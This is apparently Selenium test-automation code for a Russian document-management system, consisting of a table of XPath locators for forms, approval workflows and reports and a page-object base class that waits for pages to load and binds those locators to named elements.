    tipPoruch = '//input[contains(@id, "type-assoc-cntrl-autocomplete-input")]' # xpath # Errand type
    otvetstv_ispolnVpunktah = '//input[contains(@id, "_executor-assoc-cntrl-autocomplete-input")]' # xpath # Responsible executor in document-card items
    srokIspoln = '//input[contains(@id, "ts_limitation-date-cntrl-date")]' #xpath # Due date (middle value)
    btnOKform = '//button[contains(@id, "form-submit-button")]' #xpath # "OK" button on a form
    addPunkt = '(//button[@title = "Добавить пункт"])[1]' #xpath # "Add item" button
    textPunktaRD = 'prop_lecm-ord-table-structure_item-content' #name # RD item text
    rassilka = '//em[text() = "Рассылка"]' #xpath # "Distribution" tab
    btnVipolnit = '(//button[contains(@id, "create-mailing-list-button-button")])[1]' # xpath # "Create route" button
    punktBtnVipolnit = '//a[text() = "Создать и заполнить указатель"]' #xpath # "Create and fill in the pointer"
    otvetstv_ispolnVpunktahRD = '//input[contains(@id, "executor-assoc-cntrl-autocomplete-input")]' #xpath # Responsible executor in an RD item
    # (the "Actions" function menu)
    # Approve
    sendFor_approval = '//div[contains(text(), "Направить на согласование")]' #xpath # "Send for approval" action
    sendFor_podpis = '//div[contains(text(), "Направить на подписание")]' # xpath # "Send for signing" action
    sendFor_execution = '//div[contains(text(), "Направить на исполнение")]' # xpath # "Send for execution" action
    btnOKnaprNaIspoln = '//button[text() = "ОК"]' #xpath # "OK" on the send-for-execution confirmation form
    confirm = '(//button[contains(@id, "-button")][text() = "ОК"])[1]' #xpath # Approval confirmation
    confirm2 = '(//button[contains(@id, "-button")][text() = "ОК"])' # xpath # Approval confirmation
    confirm_3 = '(//button[contains(@id, "-button")][text() = "ОК"])[4]' # xpath # Approval confirmation
    confirm_4 = '//button[contains(@id, "-reportForm-form-submit-button")]' # xpath # Approval confirmation
    confirm_5 = '(//button[contains(@id, "-button")][text() = "ОК"])[2]' # xpath # Choice confirmation
    confirm_6 = '(//button[contains(@id, "rn-document-approval_document-kind-assoc-cntrl-ok-button")])' # xpath # Choice confirmation
    confirm_7 = '(//button[contains(@id, "document-approval_pvu-assoc-cntrl-ok-button")])' # xpath # Choice confirmation
    confirm_8 = '(//button[contains(@id, "document-approval_lnd-kind-assoc-cntrl-ok-button")])' # xpath # Choice confirmation
    confirm_9 = '//button[contains(@id, "workflow-form-form-submit-button")][text() = "ОК"]' # xpath # Approval confirmation
    # "Send report"
    actionSendAllere = '//div[text() = "Отправить отчет"]' #xpath # "Send report" action
    btnSend = '//button[text() = "Отправить"]' #xpath # "Send" button
    textAllur = '//textarea[contains(@name, "_execute_1ReportText")]' #xpath # "Report text" textarea
    btnAddSvyz = '//button[contains(@id, "tree-picker-button-button")]' #xpath # "..." add-relation button
    searchDoc = '//input[contains(@id, "picker-searchText")]' #xpath # Search input on the picker form
    oneListEl = '(//span[@class = "addIcon"])[1]' # xpath # First element in the directory list
    btnOK = '//button[contains(@id, "-ok-button")]' #xpath # "OK" button on the picker form
    status_Doc = '//span[contains(@id, "_status")]' #xpath # Document status on the "General info" tab; alt: (//div[text() = "Не начат"])[1]
    status_Doc_1 = '(//span[contains(@id, "_status")])[1]' #xpath # Document status on the "General info" tab
    status_etap = '(//div[text() = "Не начат"])[1]' # xpath # Stage status ("Not started")
    # (approval panel)
    APPROVED_button = '//button[contains(@id, "APPROVED-button")]' #xpath # "Approve" button
    APPROVED_WITH_REMARK_button = '//button[contains(@id, "APPROVED_WITH_REMARK-button")]' #xpath # "Approve with comments" button
    REJECTED_button = '//button[contains(@id, "REJECTED-button")]' #xpath # "Reject" button
    internal_approval = '//button[contains(@id, "internal_approval-button")]' #xpath # "Internal approval" button
    prop_bpm_comment = '//textarea[contains(@class, "invalid")]' #xpath # Comment field (prop_bpm_comment; was mislabelled "#name")
    prop_bpm_comment_sogl = '//textarea[contains(@id, "form_prop_bpm_comment")]' # xpath # Comment field
    apply_button_button = '//button[contains(@id, "apply-button")]' #xpath # "OK" button when submitting an approval decision
    apply_button_button2 = '//span[@class = "button-group"]//button[contains(@id, "-button") and text() = "ОК"]' #xpath # "OK" button when submitting an approval decision
    SIGNED_button = '//button[contains(@id, "SIGNED-button")]' #xpath # "Sign" button
    navedenieSogl = '(//div[contains(text(), "Внутреннее согласование")])[1]' #xpath # Hover target for the approval stage
    # # PROTOCOL (MINUTES)
    # # (document creation form)
    # addEl = '(//span[@class="addIcon"])[7]' #xpath # Document kind (working-group meeting minutes)
    # addEl2 = '(//span[@class="addIcon"])[6]' #xpath # Document kind "Internal memo"
    # DIRECTIVE DOCUMENT (RD)
    # (document creation form)
    preambula = '//textarea[contains(@id, "-eds-document_summaryContent")]' #xpath # Preamble
    obcontrol = '//input[contains(@id, "-ord_controller-assoc-cntrl-autocomplete-input")]' #xpath # Overall control
    wid_doc = '(//select[contains(@id, "_assoc_lecm-eds-document_document-type-assoc")])[1]' #xpath # Document kind (inside an RD)
    wid_doc_rasp = '//option[contains(text(), "Распоряжение")]' #xpath # RD document kind (Order)
    # PROTOCOL (MINUTES)
    # (document creation form)
    addEl = '(//span[@class="addIcon"])[7]' #xpath # Document kind (working-group meeting minutes)
    addEl2 = '(//span[@class="addIcon"])[6]' #xpath # Document kind "Internal memo"
    date = '//input[contains(@id, "_meeting-date-cntrl-date")]' #xpath # Meeting date
    category = '//input[contains(@id, "_category-assoc-cntrl-autocomplete-input")]' #xpath # Category
    Chairman = '//input[contains(@id, "chairman-assoc-cntrl-autocomplete-input")]' #xpath # Chairman
    Secretary = '//input[contains(@id, "_secretary-assoc-cntrl-autocomplete-input")]' #xpath # Secretary
    person_present = '//input[contains(@id, "_attended-assoc-cntrl-autocomplete-input")]' #xpath # Attendees
    # (document card)
    # REGISTRY
    # (document creation form)
    vid_reestra = '//select[contains(@id, "_document-registry_type")]' #xpath # Registry kind
    vid_reestraPR = '//option[contains(text(), "Передачи на регистрацию")]' #xpath # Registry kind (Transfer for registration)
    vid_reestraPP = '//option[contains(text(), "Приема/передачи")]' #xpath # Registry kind (Acceptance/transfer)
    btnCreateChern = '//button[contains(text(), "Создать черновик")]' #xpath # "Create draft" button
    btnCreateSend = '//button[contains(text(), "Создать и отправить")]' # xpath # "Create and send" button
    inpDoc = '//input[contains(@id, "registry_doc-assoc-cntrl-autocomplete-input")]' #xpath # "Documents" field
    poluchatel = '//input[contains(@id, "document-registry_receiver-assoc-autocomplete")]' #xpath # "Recipient" field
    # INTERNAL MEMO
    # (document creation form)
    adresati = '//input[contains(@id, "internal_recipients-assoc-autocomplete")]' #xpath # Addressees
    podpisanti = '// input[contains( @ id, "aspects_signerEmployeeAssoc-cntrl-autocomplete")]' #xpath # Signers
    # ARBITRARY DOCUMENT
    # (document creation form)
    prorabotka = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[1]' #xpath # Elaboration
    chBprorab = '(//input[contains(@class, "formsCheckBox")])[1]' #xpath # Elaboration checkbox
    normokontrol = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[2]' #xpath # Standards control
    chBnorm = '(//input[contains(@class, "formsCheckBox")])[2]' #xpath # Standards-control checkbox
    soglasovanie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[3]' #xpath # Approval
    podpisanie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[4]' #xpath # Signing
    utverzhdenie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[5]' #xpath # Ratification
    oznakomlenie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[7]' #xpath # Acknowledgement
    # ERRAND
    # (document creation form)
    text_poruch = 'prop_lecm-errands_content' # name # Errand text
    otvetstv_ispoln = '//input[contains(@id, "executor-assoc-autocomplete")]' #xpath # Responsible executor
    # INCOMING CORRESPONDENCE PACKAGE
    # INCOMING DOCUMENT
    # (document creation form)
    ishNumber = 'prop_lecm-incoming_outgoing-number' #name # Outgoing number (of the sender)
    dateIS = '//input[contains(@id, "-incoming_outgoing-date-cntrl-date")]' # xpath # Outgoing date
    # OUTGOING DOCUMENT
    # (document creation form)
    osnovPodpis = 'prop_lecm-outgoing_signing-basis' #name # Signing basis
    korrespondentISH = '//input[contains(@id, "contractor-assoc-autocomplete")]' #xpath # Correspondent
    clickNull = '//div[contains(@id, "_default-form-container")]' # xpath # Click outside any attribute (drops focus)
    # My search queries
    listChange = '//select[contains(@id, "default_searchQuery-selectType-entry")]' # xpath # Drop-down list
    listChangeSZ = '//option[text() = "Служебная записка"]' # xpath # Drop-down list - internal memo
    listChangeRD = '//option[text() = "Распорядительный документ"]' # xpath # Drop-down list - RD
    butSave = '//div[contains(@class, "query-button-grey")][3]' # xpath # "Save" button
    nameZap = '//input[contains(@id, "createDetails_prop_lecm-search-queries_name")]' # xpath # Query name
    zaprosToDel = '//span[text() = "ToDel"]' # xpath # The created query
    butDel = '//span[contains(@class, "yui-button yui-push-button")]//button[text() = "Удалить поисковый запрос"]' # xpath # "Delete" button
    butRed = '//span[contains(@class, "yui-button yui-push-button")]//button[text() = "Редактировать поисковый запрос"]' # xpath # "Edit" button
    butDelAc = '//span[contains(@class, "first-child")]//button[text() = "Удалить"]' # xpath # Delete confirmation button
    checkBoxFirst = '(//input[@name = "fileChecked"])[1]' # xpath # First checkbox in the list
    butAct = '(//button[text() = "Действия с выбранными"])[2]' # xpath # "Actions with selected" button
    butAct_2 = '(//button[text() = "Действия с выбранными"])' # xpath # "Actions with selected" button
    butExp = '(//button[text() = "Экспорт"])[2]' # xpath # Export button
    butExp_2 = '(//button[text() = "Экспорт"])' # xpath # Export button
    butFavorite = '//a [text() = "Добавить в избранное"]' # xpath # "Add to favorites" button
    butOK = '//button[text() = "Ок"]' # xpath # "OK" button (add to favorites)
    butSelExp = '(//a[text() = "Выгрузить выбранные"])' # xpath # Export-selected button
    # Approval card
    kurator = '// input[contains( @ id, "document-approval_curators-assoc-cntrl-autocomplete-input")]' #xpath # Curator
    viewSelecton = '//span[contains(@class, "-push-button")][contains(@id, "document-approval_document-kind-assoc-cntrl-tree-picker")]' # xpath # Document kind
    proUpLevel = '//button[contains(@id, "document-approval_pvu-assoc-cntrl-tree-picker-button-button")]' # xpath # Top-level processes
    viewLndSelecton = '//button[contains(@id, "document-approval_lnd-kind-assoc-cntrl-tree-picker-button-button")]' # xpath # Document kind (LND)
    rdSelecton = '// span[text() = "РД"]' # xpath # Pick "RD"
    lndSelecton = '// span[text() = "ЛНД"]' # xpath # Pick "LND"
    etcSelecton = '// span[text() = "Прочие"]' # xpath # Pick "Other"
    levelFirst = '// span[text() = "1-й иерархический уровень"]' # xpath # Pick the hierarchy level
    levelFirst_1 = '//input[contains(@id, "rn-document-approval_pvu-assoc-cntrl-autocomplete-input")]' # xpath # Top-level-process input field
    btnSelection4 = '(//span[contains(@class, "addIcon")])[4]' # xpath # "+" button, fourth pick
    btnContinium = '//button[text() = "Продолжить"]' # xpath # "Continue" button
    titleCS = '//input[contains(@name, "prop_lecm-document_title")]' # xpath # Title
    saveProject = '//button[text() = "Сохранить проект"]' # xpath # "Save draft" button
    btnAddPerson = '(//a[contains(@title, "Добавить")])[1]' # xpath # Add an employee
    btnAddPerson_2 = '(//span[text() = "Добавить сотрудника"]//parent::a[contains(@id, "onActionAddEmployee")])[1]' # xpath # Add an employee (variant)
    reserchInput = '//input[contains(@id, "employee-search-text")]' # xpath # Search input
    zamechSogl = '(//div[contains(@class, "annotation-comment")])' # xpath # Comments
    statusSogl = '//a[contains(@onclick, "ApprovalResult")]' # xpath # Approval status
    statusSogl_2 = '//a[contains(@class,"approval-approved-status")]' # xpath # Approval status
    rejectSogl = '//div[contains(text(), "Отозвать с согласования")]' # xpath # "Withdraw from approval" button
    reasonReject = '//textarea[@title = "Причина"]' # xpath # Rejection / withdrawal reason
    btnAction = '//button[contains(@id, "-attachment-actions-button-button")]' # xpath # "Action" button
    downLoadNewVersion = '//a[text() = "Загрузить новую версию"]' # xpath # "Upload new version" button
    bntVersion = '//button[text() = "Версии"]' # xpath # "Versions" button
    btnInApp = '//button[contains(@id, "start_internal_approval-button")]' # xpath # Internal approval button
    btnInApp_2 = '//button[contains(@id, "_internal_approval")]' # xpath # Internal approval button
    employeeForSogl = '//input[contains(@id, "employeeAssoc-cntrl-autocomplete-input")]' # xpath # "Employees" field
    btnRejectInnerSogl = '//div[@title = "Отозвать внутреннее согласование"]' # xpath # "Withdraw internal approval" button
    statusInner = '(//div[contains(@class,"approver-item-status")])[2]' # xpath # Internal approval status
    statusInner_2 = '(//div[contains(@class,"approver-item-status")])[1]' # xpath # Internal approval status
    statusInner_3 = '//a[contains(@onclick,"viewApprovalResult")]' # xpath # Internal approval status
    statusInner_4 = '(//div[contains(@class,"approver-decision-no-decision")])[2]' # xpath # Internal approval status (no decision yet)
    navedTaskInnerSogl = '(//div[text() = "Выполняется"])[1]' # xpath # Hover target for the internal approval task
    btnRjctTaskInnerApp = '(//a[contains(@title, "Отозвать")])[1]' # xpath # Withdraw the internal approval task
    btnAddAtt = '//button[contains(@id, "attachment-add-button")]' # xpath # "Add attachment" button
    bntDocForRassmotr = '//a[text() = "Документы для рассмотрения"]' # xpath # "Documents for consideration" button
    elmDownloaded = '//a[@class = "text-cropped" and contains(string(), "Doc.docx")]' # xpath # The uploaded attachment
    btnAddComment = '//button[@title = "Замечание"]' # xpath # "Add remark" button
    areaComment = '//textarea[contains(@id, "approval-annotation_comment")] ' # xpath # Remark text (trailing space kept from the original value)
    checkComment = '(//div[@class ="rn-approval-annotations"]//div[@class = "annotation-comment"])[1]' # xpath # Check comments
    returnDecision = '//div[contains(@title, "Отозвать решение")]' # xpath # "Withdraw decision" button
    softDecision = '//div[contains(@title, "Смягчить решение")]' # xpath # "Soften decision" button
    takeTasks = '//div[contains(@class, "widget-button-grey")][contains(text(), "Забрать задачу")]' # xpath # "Take the task" button
    backTasks = '//div[contains(@class, "widget-button-grey")][contains(text(), "Вернуть задачу")]' # xpath # "Return the task" button
    infoMassage = '(//div[@class = "bd"])[1]' # xpath # Info message
    butDelComment = '//div[@title = "Удалить"]' # xpath # Delete-comment button
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# TODO: write article about the __elements inheritance hack.
# TODO: switch to iframe
# TODO: overlapping elements ???
# TODO: add right click
import time
from KSED.elements import WebElement, ManyWebElements
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
#from utils import KNOWN_JS_ISSUES
from termcolor import colored
from KSED.TestData.locators import KSEDLocators
class WebPage(object):
    """Base page object wrapping a Selenium WebDriver.

    Attribute access is customized: any public, non-callable class attribute
    (a ``WebElement``-style descriptor) receives the live driver on read and
    is assigned through its ``_set_value`` helper on write, so tests can do
    ``page.username_text = 'john'`` instead of locating elements by hand.
    """

    # Placeholder only; replaced per-instance in __init__.
    _web_driver = 'my web driver'

    def __init__(self, web_driver, url=''):
        """Store the driver and open *url*, waiting for the page to load."""
        self._web_driver = web_driver
        self.get(url)

    def __setattr__(self, name, value):
        # Public names are page elements: delegate the assignment to the
        # element itself (e.g. typing text into an input field).
        if not name.startswith('_'):
            self.__getattribute__(name)._set_value(self._web_driver, value)
        else:
            super(WebPage, self).__setattr__(name, value)

    def __getattribute__(self, item):
        attr = object.__getattribute__(self, item)
        # Inject the live driver into page-element attributes on every access.
        if not item.startswith('_') and not callable(attr):
            attr._web_driver = self._web_driver
        return attr

    def get(self, url):
        """Open *url* and wait until the page is completely loaded."""
        self._web_driver.get(url)
        self.wait_page_loaded()

    def go_back(self):
        """Navigate one step back in the browser history."""
        self._web_driver.back()
        self.wait_page_loaded()

    def refresh(self):
        """Reload the current page."""
        self._web_driver.refresh()
        self.wait_page_loaded()

    def screenshot(self, file_name='screenshot.png'):
        """Save a screenshot of the current page to *file_name*."""
        self._web_driver.screenshot(file_name)

    def scroll_down(self, offset=0):
        """Scroll the page down by *offset* pixels (to the bottom if 0)."""
        if offset:
            self._web_driver.execute_script('window.scrollTo(0, {0});'.format(offset))
        else:
            self._web_driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')

    def scroll_up(self, offset=0):
        """Scroll the page up by *offset* pixels (to the top if 0)."""
        if offset:
            self._web_driver.execute_script('window.scrollTo(0, -{0});'.format(offset))
        else:
            self._web_driver.execute_script('window.scrollTo(0, -document.body.scrollHeight);')

    def switch_to_iframe(self, iframe):
        """Switch the driver focus to the iframe with the given name."""
        self._web_driver.switch_to.frame(iframe)

    def switch_out_iframe(self):
        """Cancel iframe focus and return to the main document."""
        self._web_driver.switch_to.default_content()

    def get_current_url(self):
        """Return the browser's current URL."""
        return self._web_driver.current_url

    def get_page_source(self):
        """Return the current page HTML source ('' if the driver call fails)."""
        source = ''
        try:
            source = self._web_driver.page_source
        except Exception:  # was a bare except; keep the best-effort behaviour
            print(colored('Cannot get page source', 'red'))
        return source

    def check_js_errors(self, ignore_list=None):
        """Assert that the browser console has no non-WARNING JS messages.

        :param ignore_list: substrings of known/accepted error messages.
        """
        ignore_list = ignore_list or []
        logs = self._web_driver.get_log('browser')
        for log_message in logs:
            if log_message['level'] != 'WARNING':
                ignore = any(issue in log_message['message'] for issue in ignore_list)
                assert ignore, 'JS error "{0}" on the page!'.format(log_message)

    def wait_page_loaded(self, timeout=60, check_js_complete=True,
                         check_page_changes=True, check_images=False,
                         wait_for_element=None,
                         wait_for_xpath_to_disappear='',
                         long_sleep=2):
        """Wait until the page is completely loaded.

        Several independent signals are combined:
          1) JS ``document.readyState`` is 'complete'
          2) the page source stopped changing
          3) all images uploaded completely (disabled by default;
             *check_images* is currently unused — kept for compatibility)
          4) expected element clickable / unwanted element gone
        The whole check must pass twice in a row before the page is
        declared loaded.
        """
        page_loaded = False
        double_check = False
        k = 0
        if long_sleep:
            time.sleep(long_sleep)
        # Remember the page source so changes in the HTML can be detected:
        source = ''
        try:
            source = self._web_driver.page_source
        except Exception:
            pass
        # Poll every 0.5 s (scrolling down so lazily-loaded content appears):
        while not page_loaded:
            time.sleep(0.5)
            k += 1
            if check_js_complete:
                try:
                    self._web_driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')
                    page_loaded = self._web_driver.execute_script("return document.readyState == 'complete';")
                except Exception:
                    pass
            if page_loaded and check_page_changes:
                # The page counts as loaded only once its source is stable:
                new_source = ''
                try:
                    new_source = self._web_driver.page_source
                except Exception:
                    pass
                page_loaded = new_source == source
                source = new_source
            # Wait for some element to disappear:
            if page_loaded and wait_for_xpath_to_disappear:
                bad_element = None
                try:
                    bad_element = WebDriverWait(self._web_driver, 0.1).until(
                        EC.presence_of_element_located((By.XPATH, wait_for_xpath_to_disappear))
                    )
                except Exception:
                    pass  # Ignore timeout errors
                page_loaded = not bad_element
            if page_loaded and wait_for_element:
                try:
                    page_loaded = WebDriverWait(self._web_driver, 0.1).until(
                        EC.element_to_be_clickable(wait_for_element._locator)
                    )
                except Exception:
                    pass  # Ignore timeout errors
            # Each iteration takes ~0.5 s; compare elapsed time to the timeout.
            # (The original compared the iteration count k directly against
            # *timeout*, which halved the effective timeout in seconds.)
            assert k * 0.5 < timeout, 'The page loaded more than {0} seconds!'.format(timeout)
            # Require the full check to pass twice in a row:
            if page_loaded and not double_check:
                page_loaded = False
                double_check = True
        # Scroll back to the top. NOTE(review): scrollTo args are (x, y) —
        # passing the height as x still lands at y=0; confirm intent.
        self._web_driver.execute_script('window.scrollTo(document.body.scrollHeight, 0);')
class MPages(WebPage):
    """All page elements of the KSED UI, declared as WebElement descriptors.

    Locator strings live in ``KSEDLocators``; this class only binds them to
    named page elements that ``WebPage`` wires to the live driver.
    """

    melements = WebElement(xpath='//div[contains(@class, "shown")]//span[contains(text(), "Отчеты по исполнительской дисциплине")]')  # menu item "Executive discipline reports"
    m2elements = WebElement(xpath='//a[contains(text(), "Состояние исполнения резолюций")]')  # link "Resolution execution status"
    # Login form
    username_text = WebElement(name=KSEDLocators.username_text)  # login
    password_text = WebElement(name=KSEDLocators.password_text)  # password
    LogIn_button = WebElement(xpath=KSEDLocators.LogIn_button)  # "Log in" button
    # *******MENU BAR*******
    ksed = WebElement(xpath=KSEDLocators.ksed)  # KSED (xpath)
    barcode_search = WebElement(id_=KSEDLocators.barcode_search)  # search by barcode (id)
    search_bc = WebElement(xpath=KSEDLocators.search_bc)  # barcode search input
    more_menu = WebElement(id_=KSEDLocators.more_menu)  # "More" menu
    ksed_in_more_m = WebElement(id_=KSEDLocators.ksed_in_more_m)  # KSED inside the "More" menu
    Company_dir = WebElement(xpath=KSEDLocators.Company_dir)  # organization directory
    admin = WebElement(xpath=KSEDLocators.admin)  # administration
    transfer = WebElement(xpath=KSEDLocators.transfer)  # case transfer
    arm_arh = WebElement(xpath=KSEDLocators.arm_arh)  # "Archive" workstation
    verify = WebElement(xpath=KSEDLocators.verify)  # verification
    scanner = WebElement(xpath=KSEDLocators.scanner)  # barcode scanner work
    notification = WebElement(id_=KSEDLocators.notification)  # notifications
    notificationProtokol = WebElement(xpath=KSEDLocators.notificationProtokol)  # first protocol notification in the list
    notificationFirst = WebElement(xpath=KSEDLocators.notificationFirst)  # first notification in the list
    # *******USER MENU*******
    user_menu = WebElement(xpath=KSEDLocators.user_menu)  # user menu
    USER_LOGOUT = WebElement(xpath=KSEDLocators.USER_LOGOUT)  # log out of the system
    my_profile = WebElement(xpath=KSEDLocators.my_profile)  # "My profile" menu item
    fieldlabel = WebElement(xpath=KSEDLocators.fieldlabel)  # position in the short-info area
    btnEdit_profile = WebElement(xpath=KSEDLocators.btnEdit_profile)  # "Edit profile" button
    inputPosition = WebElement(xpath=KSEDLocators.inputPosition)  # position input field
    logic_ESM = WebElement(xpath=KSEDLocators.logic_ESM)  # "Logic ECM. My profile" menu item
    autoAnswerText = WebElement(name=KSEDLocators.autoAnswerText)  # auto-reply text ("Out of office")
    btnCancelAbsence = WebElement(xpath=KSEDLocators.btnCancelAbsence)  # "Cancel absence" button
    btnYes = WebElement(xpath=KSEDLocators.btnYes)  # "Yes" button (cancel absence)
    edit_password = WebElement(xpath=KSEDLocators.edit_password)  # "Change password" menu item
    inputOldPassword = WebElement(xpath=KSEDLocators.inputOldPassword)  # old password input
    inputNewPassword1 = WebElement(xpath=KSEDLocators.inputNewPassword1)  # new password input (source comment said "old password" — likely copy-paste; verify)
    inputNewPassword2 = WebElement(xpath=KSEDLocators.inputNewPassword2)  # new password confirmation (source comment said "old password" — likely copy-paste; verify)
    btnOKchange = WebElement(xpath=KSEDLocators.btnOKchange)  # "Change password" button
    # *******LEFT SIDE OF THE PAGE ("Create" button and sections)*******
    newDoc_button = WebElement(xpath=KSEDLocators.newDoc_button)  # "Create"
    protocol = WebElement(xpath=KSEDLocators.protocol)  # Protocol
    rd = WebElement(xpath=KSEDLocators.rd)  # Administrative document (RD)
    reestr = WebElement(xpath=KSEDLocators.reestr)  # Registry
    poruchenie = WebElement(xpath=KSEDLocators.poruchenie)  # Assignment
    cardSogl = WebElement(xpath=KSEDLocators.cardSogl)  # Approval card
    resolution = WebElement(xpath=KSEDLocators.resolution)  # Resolution
    SZ = WebElement(xpath=KSEDLocators.SZ)  # Internal memo
    proizvDoc = WebElement(xpath=KSEDLocators.proizvDoc)  # Arbitrary document
    paket_vh = WebElement(xpath=KSEDLocators.paket_vh)  # Incoming correspondence package
    vhDoc = WebElement(xpath=KSEDLocators.vhDoc)  # Incoming document
    ishDoc = WebElement(xpath=KSEDLocators.ishDoc)  # Outgoing document
    # SECTIONS
    myWork = WebElement(xpath=KSEDLocators.myWork)  # My work
    expedition = WebElement(xpath=KSEDLocators.expedition)  # Dispatch office
    navigation = WebElement(xpath=KSEDLocators.navigation)  # Navigator
    allur = WebElement(xpath=KSEDLocators.allur)  # Reports
    workReg = WebElement(xpath=KSEDLocators.workReg)  # Registrar's work
    medo = WebElement(xpath=KSEDLocators.medo)  # MEDO
    mySearch = WebElement(xpath=KSEDLocators.mySearch)  # My search queries
    poiskzapr = WebElement(xpath=KSEDLocators.poiskzapr)  # Search queries
    myPoiskZapr = WebElement(xpath=KSEDLocators.myPoiskZapr)  # Search queries
    ControlZapr = WebElement(xpath=KSEDLocators.ControlZapr)  # Search query management
    btnPlus = WebElement(xpath=KSEDLocators.btnPlus)  # expand button in "My queries"
    # VIEW AREA (KSED)
    oblProsm = WebElement(xpath=KSEDLocators.oblProsm)  # view area
    oneDocInList = WebElement(xpath=KSEDLocators.oneDocInList)  # first document in the list
    nineDocInList = WebElement(xpath=KSEDLocators.nineDocInList)  # ninth document in the list
    subordinate = ManyWebElements(xpath=KSEDLocators.subordinate)  # "+" expand subordinate documents
    oneSubordInList = WebElement(xpath=KSEDLocators.oneSubordInList)  # first link to a subordinate document
    ActionTab = WebElement(xpath=KSEDLocators.ActionTab)  # "Actions with selected" button
    chBinOnl = WebElement(xpath=KSEDLocators.chBinOnl)  # NOTE(review): undocumented in source — purpose unclear
    # My work
    WorkImmid = WebElement(xpath=KSEDLocators.WorkImmid)  # My work - urgent
    connectedDoc = WebElement(xpath=KSEDLocators.connectedDoc)  # related documents
    # REPORTS
    section_allur = WebElement(xpath=KSEDLocators.section_allur)  # "Reports" section
    node_Logs = WebElement(xpath=KSEDLocators.node_Logs)  # "Journals"
    node_Statis = WebElement(xpath=KSEDLocators.node_Statis)  # "Statistical reports"
    edsBykindStat = WebElement(xpath=KSEDLocators.edsBykindStat)  # "Summary by document kinds" report
    node_ispDisp = WebElement(xpath=KSEDLocators.node_ispDisp)
    logs_incDoc = WebElement(xpath=KSEDLocators.logs_incDoc)
    incomingRegJournal = WebElement(xpath=KSEDLocators.incomingRegJournal)  # "Incoming documents registration journal" report
    logs_outDoc = WebElement(xpath=KSEDLocators.logs_outDoc)
    outgoingRegistration = WebElement(xpath=KSEDLocators.outgoingRegistration)  # "Outgoing documents registration journal" report
    logs_raspDoc = WebElement(xpath=KSEDLocators.logs_raspDoc)
    ordRegJournal = WebElement(xpath=KSEDLocators.ordRegJournal)  # "Administrative documents registration journal" report
    logs_sluDoc = WebElement(xpath=KSEDLocators.logs_sluDoc)
    internalRegJournal = WebElement(xpath=KSEDLocators.internalRegJournal)  # "Internal memos registration journal" report
    stat_specDoc = WebElement(xpath=KSEDLocators.stat_specDoc)
    stat_temDoc = WebElement(xpath=KSEDLocators.stat_temDoc)
    edsBySubjectStat = WebElement(xpath=KSEDLocators.edsBySubjectStat)  # "Summary by document subjects" report
    stat_temDocO = WebElement(xpath=KSEDLocators.stat_temDocO)
    edsBySubjectStatO = WebElement(xpath=KSEDLocators.edsBySubjectStatO)  # "Summary by document subjects (combined)" report
    stat_tipDoc = WebElement(xpath=KSEDLocators.stat_tipDoc)
    edByTypeStat = WebElement(xpath=KSEDLocators.edByTypeStat)  # "Summary by document types" report
    allu_ispIncDoc = WebElement(xpath=KSEDLocators.allu_ispIncDoc)
    allu_raspDoc = WebElement(xpath=KSEDLocators.allu_raspDoc)
    allu_sluDoc = WebElement(xpath=KSEDLocators.allu_sluDoc)
    allu_ispDis = WebElement(xpath=KSEDLocators.allu_ispDis)
    allu_ispDispA = WebElement(xpath=KSEDLocators.allu_ispDispA)
    allu_NispDI = WebElement(xpath=KSEDLocators.allu_NispDI)
    allu_NispDIrg = WebElement(xpath=KSEDLocators.allu_NispDIrg)
    allu_istS = WebElement(xpath=KSEDLocators.allu_istS)
    allu_narS = WebElement(xpath=KSEDLocators.allu_narS)
    allu_prodIsp = WebElement(xpath=KSEDLocators.allu_prodIsp)
    allu_prodPodr = WebElement(xpath=KSEDLocators.allu_prodPodr)
    allu_ReesContr = WebElement(xpath=KSEDLocators.allu_ReesContr)
    allu_ReesContrN = WebElement(xpath=KSEDLocators.allu_ReesContrN)
    allu_ReesContrF = WebElement(xpath=KSEDLocators.allu_ReesContrF)
    allu_SostIspR = WebElement(xpath=KSEDLocators.allu_SostIspR)
    # *******WORKING WITH DOCUMENTS*******
    # COMMON ATTRIBUTES
    # (document creation form)
    title = WebElement(name=KSEDLocators.title)  # title
    category_doc = WebElement(xpath=KSEDLocators.category_doc)  # document category
    doc_type = WebElement(xpath=KSEDLocators.doc_type)  # document kind (selection button)
    doc_typeInp = WebElement(xpath=KSEDLocators.doc_typeInp)  # document kind (input field)
    btnOKDT = WebElement(xpath=KSEDLocators.btnOKDT)  # document kind ("OK" button)
    podpisant = WebElement(xpath=KSEDLocators.podpisant)  # signer(s)
    sposob_dost = WebElement(xpath=KSEDLocators.sposob_dost)  # delivery method
    btnCreateDoc = WebElement(xpath=KSEDLocators.btnCreateDoc)  # "Create" button
    adresat = WebElement(xpath=KSEDLocators.adresat)  # addressee
    korrespondent = WebElement(xpath=KSEDLocators.korrespondent)  # correspondent
    # (document card)
    attachments = WebElement(xpath=KSEDLocators.attachments)  # go to the "Attachments" tab
    vlozheniya = WebElement(xpath=KSEDLocators.vlozheniya)  # attachments (expand section)
    remarks = WebElement(xpath=KSEDLocators.remarks)  # remarks
    remarksBtn = WebElement(xpath=KSEDLocators.remarksBtn)  # remarks button
    osnSvedeniya = WebElement(xpath=KSEDLocators.osnSvedeniya)  # basic information (expand section)
    printForm = WebElement(xpath=KSEDLocators.printForm)  # print forms (expand section)
    printBarCode = WebElement(xpath=KSEDLocators.printBarCode)  # document barcode print form
    btnPrintInPrintForm = WebElement(id_=KSEDLocators.btnPrintInPrintForm)  # print button in the print form window
    btnOKpodpis = WebElement(xpath=KSEDLocators.btnOKpodpis)  # OK button confirming the signing
    mode = WebElement(xpath=KSEDLocators.mode)  # switch to the two-panel view
    fileUpload = WebElement(xpath=KSEDLocators.fileUpload)  # upload a file
    fileUpload2 = WebElement(xpath=KSEDLocators.fileUpload2)  # upload a file in an assignment
    fileUpload3 = WebElement(xpath=KSEDLocators.fileUpload3)  # upload a file in an assignment
